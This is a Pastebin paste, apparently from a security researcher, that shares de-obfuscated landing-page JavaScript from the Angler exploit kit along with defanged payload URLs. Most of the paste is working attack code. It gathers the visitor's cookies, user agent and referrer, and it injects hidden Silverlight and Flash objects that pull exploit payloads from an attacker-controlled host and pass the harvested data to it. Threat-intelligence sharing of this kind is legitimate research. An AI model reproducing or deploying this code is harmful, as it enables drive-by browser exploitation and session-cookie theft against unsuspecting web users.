Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Angler EK De-obfuscated
- ******
- Silverlight & Flash payloads
- *******
- Payloads
- ******
- hxxp://aergernisseravintolaansa.neuropathysupport.org/?r=&h=APBh302sN&n=&s=GX9rBCN&f=&g=NGGxo1&u=3rrRlwL_yk&p=XorhGc3a3&j=&b=Gox3uRJ
- hxxp://aergernisseravintolaansa.neuropathysupport.org/?t=D9E-&r=J34&e=CErpXFFb&u=cA0_ABU&q=&w=TtuCk&x=Osk2jQ&j=B-b0pm&s=&g=uFjZJJm7K
- hxxp://aergernisseravintolaansa.neuropathysupport.org/?l=&i=Lm2y&q=es3NcAUV&v=pcqsF4goj&t=&k=Q-iA-FNZ8B&g=GDpEdRWQo&a=V2JKx-4rfd809a24395b2a6cb60110fb35a8ec6eebb15798
- hxxp://aergernisseravintolaansa.neuropathysupport.org/?y=B-oC&d=UntZ9Bi&n=&x=nHxAGjttNaYVxBViYlO5Wq3xBaWaRMib5ojB_
- hxxp://aergernisseravintolaansa.neuropathysupport.org/?y=U1EJRx-u&a=SynGIivs&g=&p=nUgqt&f=QjZMCxzw56keluQ174xhVpSASs0ee9cb60e9fa31459eb417f555ed94afa92937f3d
- ******
- File1
- ******
- function Jeh1jEjepq() {
- return window.btoa(window['cooc']);
- };
- function getKolaio() {
- return JWQC(ivKvzfcr_ivKvzfcr);
- }
- function getTxl() {
- return JWQC(ivKvzfcs_ivKvzfcs);
- }
- function gIu() {
- return JWQC(ivKvzfcw_ivKvzfcw);
- }
- var tSp = '<form id="form1" runat="server" style="height: 100%">' +
- '<div id="silverlightControlHost">' +
- '<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%">' +
- '<param name="minRuntimeVersion" value="4.0.50524.0" />' +
- '<param name="autoUpgrade" value="false" />' +
- '<param name="source" value="http://' + getKolaio() + '/' + getTxl() + '" />' +
- '<param name="initParams" value="gvTrvze=' + gIu() + ',KetErve=' + Jeh1jEjepq() + '"/>' +
- '</object>' +
- '</div>' +
- '</form>';
- document.getElementsByTagName("q")[3].innerHTML = tSp;
- ******
- File2
- ******
- if (window.T8eJEEf1) {
- var a = 'appendChild',
- d = document,
- w = window;
- function getH() {
- return w.btoa(w['cooc']);
- };
- function getKolaio() {
- return JWQC(ivKvzfck_ivKvzfck);
- }
- function getTxl(a) {
- return JWQC(ivKvzfcg_ivKvzfcg);
- }
- function getD() {
- return JWQC(ivKvzfct_ivKvzfct);
- }
- function getData(a) {
- return JWQC(ivKvzfcp_ivKvzfcp);
- }
- function getG() {
- return ivKvzfco_ivKvzfco;
- }
- function getDx() {
- if (!!w.dek1o) {
- return getD()
- } else {
- "ew"
- };
- }
- var s = 'setAttribute',
- mirtul = "1",
- ci = "clsid:",
- isMSIE = (function() {
- return (!!w.MSInputMethodContext ? 11 : !d.all ? 99 : w.atob ? 10 : d.addEventListener ? 9 : d.querySelector ? 8 : w.XMLHttpRequest ? 7 : d.compatMode ? 6 : w.attachEvent ? 5 : 1) < 11;
- })(),
- furl = 'http://' + getKolaio() + '/' + getTxl(mirtul),
- fvar = 'exec=' + getData(mirtul) + '&h=' + getH() + '&g=' + getG() + '&u=' + getD() + '';
- function cParam(pN, pV) {
- var p = d.createElement("param");
- p[s]("name", pN);
- p[s]("value", pV);
- return p;
- }
- function cObject(url, fv) {
- var div = d.createElement("div");
- div.innerHTML = "<object id='23kjsdf' classid='" + ci + "D27CDB6E-AE6D-11cf-96B8-444553540000' width=1 height=1 allowScriptAccess='always'>" + "<param name='movie' value='" + url + "'>" + "<param name='play' value='true'>" + "<param name='FlashVars' value='" + fv + "'>" + "</object>";
- return div.firstChild;
- }
- var obj = (isMSIE) ? cObject(furl, fvar) : document.createElement("object"),
- p1 = cParam('movie', 'http://' + getKolaio() + '/' + getTxl(mirtul)),
- p2 = cParam('play', 'true'),
- p3 = cParam('FlashVars', fvar);
- obj[s]("id", "23kjsdf");
- obj[s]("width", "1");
- obj[s]("height", "1");
- if (!isMSIE) {
- obj[s]("type", "application/x-shockwave-flash");
- obj[s]("data", furl);
- obj[a](p1);
- obj[a](p2);
- obj[a](p3);
- }
- if (w.s2e) {
- obj = 0
- }
- try {;
- } catch (e) {}
- var target_element = d.getElementsByTagName("q")[2];
- target_element.parentNode.replaceChild(obj, target_element);
- }
- ******
- File3
- ******
- window.T8eJEEf1 = true;
- window.T8eJEEf2 = true;
- if (!Array.prototype.indexOf) {
- Array.prototype.indexOf = function(obj, start) {
- for (var i = (start || 0), j = this.length; i < j; i++) {
- if (this[i] === obj) {
- return i;
- }
- }
- return -1;
- };
- }
- if (!window.btoa) {
- var Base64 = {
- _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
- encode: function(b) {
- var q, l, p, f, k, g, d, m = "",
- j = 0;
- for (b = Base64._utf8_encode(b); j < b.length;) {
- q = b.charCodeAt(j++), l = b.charCodeAt(j++), p = b.charCodeAt(j++), f = q >> 2, k = (3 & q) << 4 | l >> 4, g = (15 & l) << 2 | p >> 6, d = 63 & p, isNaN(l) ? g = d = 64 : isNaN(p) && (d = 64), m = m + this._keyStr.charAt(f) + this._keyStr.charAt(k) + this._keyStr.charAt(g) + this._keyStr.charAt(d);
- }
- return m;
- },
- _utf8_encode: function(d) {
- d = d.replace(/\r\n/g, "\n");
- for (var c = "", f = 0; f < d.length; f++) {
- var b = d.charCodeAt(f);
- 128 > b ? c += String.fromCharCode(b) : b > 127 && 2048 > b ? (c += String.fromCharCode(b >> 6 | 192), c += String.fromCharCode(63 & b | 128)) : (c += String.fromCharCode(b >> 12 | 224), c += String.fromCharCode(b >> 6 & 63 | 128), c += String.fromCharCode(63 & b | 128));
- }
- return c;
- }
- };
- window.btoa = function(str) {
- return Base64.encode(str);
- }
- }
- window['cooc'] = (function() {
- var ln1 = (navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage));
- var t = 'Accept: *\/*\r\n' + 'User-Agent: ' + navigator.userAgent + '\r\n' + (document.referrer ? 'Referer: ' + document.referrer + '\r\n' : "") + 'Accept-Language: ' + (!!ln1 ? ln1 : "en-US") + '\r\n' + 'Accept-Encoding: gzip, deflate' + (!!document.cookie ? '\r\nCookie: ' + document.cookie : '');
- return t;
- })();
- var p = 'push',
- i = 'indexOf';
- window["JWQC"] = new Function('vtx', "var cryptKey = ivKvzfcu_ivKvzfcu, rA = cryptKey.split(''), sA = cryptKey.split(''), keyArray=[];sA.sort(); var keySize = sA.length;for (var i=0; i<keySize; i++) {keyArray." + p + "(rA." + i + "(sA[i]));}vtx = vtx.replace(/\\+/g,'%');var k = keySize - vtx.length % keySize;for(var l = 0; l<k;l++) {vtx += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < vtx.length; i += keySize) {line = vtx.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}delete(rA);delete(sA);delete(keyArray);delete(newLine);delete(line);endStr=endStr.replace(/\\s/g,'');return endStr;");
- *******
- *******
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment